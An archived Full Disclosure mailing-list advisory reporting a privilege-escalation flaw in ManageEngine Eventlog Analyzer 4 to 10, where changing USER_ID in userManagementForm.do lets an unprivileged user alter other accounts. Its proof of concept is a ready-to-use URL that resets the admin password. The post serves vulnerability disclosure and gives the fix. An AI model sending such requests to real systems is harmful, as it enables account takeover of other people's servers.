lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <d9c8e7310c019f121ee418f9eaca89f8.webmail@localhost>
Date: Fri, 29 Jan 2016 16:16:56 -0000
From: graphx@...aint.org
Subject: [FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Esacalation

# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10


1.     Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do.  An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user. 
Testing discovered that the default admin and guest accounts are 1 and 2.

Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.


2) Proof of Concept

	-login as an unprivileged user
	-Use the following URL to change the admin password to "admin"
	http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin


3 Solution:
Upgrade to 10.8



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ